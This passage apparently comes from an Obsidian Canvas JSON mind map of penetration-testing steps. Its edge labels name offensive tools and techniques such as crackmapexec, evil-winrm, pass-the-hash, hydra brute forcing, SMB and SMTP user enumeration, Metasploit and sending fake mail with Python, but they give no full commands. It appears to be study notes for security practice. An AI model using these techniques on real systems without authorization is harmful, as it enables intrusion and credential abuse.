		{"id":"1b9e2fd0e5b9f703","fromNode":"e1f2694c648bd3a0","fromSide":"right","toNode":"79a947b88b1fecbd","toSide":"left","label":"$ crackmapexec"},
		{"id":"a65c196340c5bad8","fromNode":"79a947b88b1fecbd","fromSide":"right","toNode":"c0405c81544814d5","toSide":"left","label":"passthehash"},
		{"id":"fc56ef2f477ec43d","fromNode":"bd628c3de238ad15","fromSide":"bottom","toNode":"22247ff212d21755","toSide":"top"},
		{"id":"72a6a88c80ae34ce","fromNode":"bd628c3de238ad15","fromSide":"bottom","toNode":"f9fb795ded8f4052","toSide":"top"},
		{"id":"d993e2b3be8dca51","fromNode":"e1f2694c648bd3a0","fromSide":"right","toNode":"3c79f8a36c9d0d5b","toSide":"left","label":"$ evil-winrm"},
		{"id":"f3606bf646cacfd0","fromNode":"3c79f8a36c9d0d5b","fromSide":"right","toNode":"171a1e0ec152519d","toSide":"left","label":"passthehash"},
		{"id":"af545224e4af6131","fromNode":"3c79f8a36c9d0d5b","fromSide":"right","toNode":"66cb93ad49805438","toSide":"left","label":"file transfer"},
		{"id":"aef126cfca0ef13c","fromNode":"02e20d80f1c173f3","fromSide":"right","toNode":"1cae2656738d720b","toSide":"left","label":"$ hydra"},
		{"id":"b7bcdf2a747246bc","fromNode":"26b22c168eac83b4","fromSide":"bottom","toNode":"a8724ff26c686ab7","toSide":"top"},
		{"id":"1cec4af1cea93d34","fromNode":"fff5755fb62b1673","fromSide":"right","toNode":"478fd974bea326a8","toSide":"left","label":"send fake mail with python"},
		{"id":"f280c1df05fbf0d3","fromNode":"bd628c3de238ad15","fromSide":"right","toNode":"137f43619df7a1c5","toSide":"left","label":"$ crackmapexec"},
		{"id":"4252c42c447cdb05","fromNode":"02e20d80f1c173f3","fromSide":"bottom","toNode":"ce467c6a5dc9f314","toSide":"top"},
		{"id":"ab0ad4bd214bc02c","fromNode":"3fcb2b57fa20a16a","fromSide":"right","toNode":"cdbe3ca3daa8d98a","toSide":"left"},
		{"id":"85eed66bee7bc9ad","fromNode":"3fcb2b57fa20a16a","fromSide":"right","toNode":"088c684b102c59ce","toSide":"left"},
		{"id":"737e48e306e7c1c6","fromNode":"e9d65cec2b6ba0b8","fromSide":"right","toNode":"c5be1017c77df9a0","toSide":"left"},
		{"id":"7ac0d3162ac629e7","fromNode":"bd628c3de238ad15","fromSide":"right","toNode":"05eee1a18ed5507b","toSide":"left","label":"$ smbmap"},
		{"id":"1dd5ca61abd76f1e","fromNode":"fff5755fb62b1673","fromSide":"bottom","toNode":"4668ce2cdf52033a","toSide":"top","label":"$ nmap"},
		{"id":"5b61a7bf3e04113d","fromNode":"fff5755fb62b1673","fromSide":"bottom","toNode":"f88bcc261ef84047","toSide":"top","label":"$ smtp-user-enum "},
		{"id":"665fb5c5b41613fc","fromNode":"7ea07dac85e70ea5","fromSide":"right","toNode":"c060b94e13859d4a","toSide":"left","label":"$ finger"},
		{"id":"cb67635b9437fdb8","fromNode":"7ea07dac85e70ea5","fromSide":"right","toNode":"f2104410a1f734c8","toSide":"left","label":"$ msf"},
		{"id":"b866e658407e3da8","fromNode":"7ea07dac85e70ea5","fromSide":"right","toNode":"fc9ecd681f1bf8b5","toSide":"left","label":"$ finger-user-enum.pl"},
		{"id":"e215462c6e56371e","fromNode":"121d120e5c92667e","fromSide":"right","toNode":"7ea07dac85e70ea5","toSide":"left"},
		{"id":"19fe8f349b660dcb","fromNode":"c07c8d0afb0212fd","fromSide":"right","toNode":"2d2cd080a6ba7aeb","toSide":"left","label":"$ msf"},
		{"id":"8ff0164067b0f390","fromNode":"2d2cd080a6ba7aeb","fromSide":"right","toNode":"5ba7f98df52fd958","toSide":"left"},
		{"id":"ca831fb626a665d3","fromNode":"c07c8d0afb0212fd","fromSide":"right","toNode":"ef2b1d0f0e397e92","toSide":"left","label":"$ mysql"},
		{"id":"c857bc457be870dd","fromNode":"2d2cd080a6ba7aeb","fromSide":"right","toNode":"41b140a2f6d2996b","toSide":"left"}
	]
}